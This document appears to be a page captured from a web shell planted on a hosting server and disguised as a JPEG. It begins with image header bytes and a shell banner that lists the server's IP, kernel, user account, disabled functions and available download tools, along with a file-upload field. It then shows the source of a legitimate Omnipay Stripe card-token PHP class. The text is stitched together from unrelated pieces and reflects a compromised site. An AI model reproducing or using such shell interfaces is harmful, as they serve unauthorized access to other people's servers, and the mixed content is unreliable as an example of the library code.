����JFIF��x�x����'
| Server IP : 78.140.185.180  /  Your IP : 216.73.216.38 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/./././././public_html/vendor/omnipay/stripe/src/Message/  | 
Upload File :  | 
<?php
namespace Omnipay\Stripe\Message;
use Omnipay\Common\Exception\InvalidRequestException;
/**
 * Message which creates a new card token, or in a Connect API
 * workflow can be used to share clients between the platform and
 * the connected accounts.
 *
 * Creates a single use token that wraps the details of a credit card.
 * This token can be used in place of a credit card dictionary with any API method.
 * These tokens can only be used once: by creating a new charge object, or attaching them to a customer.
 *
 * In most cases, you should create tokens client-side using Checkout, Elements, or our mobile libraries,
 * instead of using the API.
 *
 * @link https://stripe.com/docs/api#create_card_token
 */
class CreateTokenRequest extends AbstractRequest
{
    /**
     * @inheritdoc
     *
     * @param \Omnipay\Common\CreditCard $value Credit card object
     * @return \Omnipay\Common\Message\AbstractRequest $this
     */
    public function setCard($value)
    {
        return parent::setCard($value);
    }
    /**
     * The id of the customer with format cus_<identifier>.
     * <strong>Only use this if you are using Connect API</strong>
     *
     * @param string $customer The id of the customer
     * @return \Omnipay\Common\Message\AbstractRequest|\Omnipay\Stripe\Message\CreateTokenRequest
     */
    public function setCustomer($customer)
    {
        return $this->setParameter('customer', $customer);
    }
    /**
     * Get the raw data array for this message. The format of this varies from gateway to
     * gateway, but will usually be either an associative array, or a SimpleXMLElement.
     * @return mixed
     * @throws InvalidRequestException
     */
    public function getData()
    {
        $data = array();
        if ($this->getParameter('customer')) {
            $data['customer'] = $this->getParameter('customer');
        } elseif ($this->getParameter('card')) {
            /* @var $card \OmniPay\Common\CreditCard */
            $card = $this->getParameter('card');
            $card->validate();
            $card_data = array(
                'exp_month' => $card->getExpiryMonth(),
                'exp_year' => $card->getExpiryYear(),
                'number' => $card->getNumber(),
            );
            if ($card->getBillingCity()) {
                $card_data['address_city'] = $card->getBillingCity();
            }
            if ($card->getBillingCountry()) {
                $card_data['address_country'] = $card->getBillingCountry();
            }
            if ($card->getBillingAddress1()) {
                $card_data['address_line1'] = $card->getBillingAddress1();
            }
            if ($card->getBillingAddress2()) {
                $card_data['address_line2'] = $card->getBillingAddress2();
            }
            if ($card->getBillingState()) {
                $card_data['address_state'] = $card->getBillingState();
            }
            if ($card->getBillingPostcode()) {
                $card_data['address_zip'] = $card->getBillingPostcode();
            }
            if ($card->getCvv()) {
                $card_data['cvc'] = $card->getCvv();
            }
            if ($card->getBillingName()) {
                $card_data['name'] = $card->getBillingName();
            }
            $data['card'] = $card_data;
        } else {
            throw new InvalidRequestException("You must pass either the card or the customer");
        }
        return $data;
    }
    /**
     * @inheritdoc
     *
     * @return string The endpoint for the create token request.
     */
    public function getEndpoint()
    {
        return $this->endpoint . '/tokens';
    }
}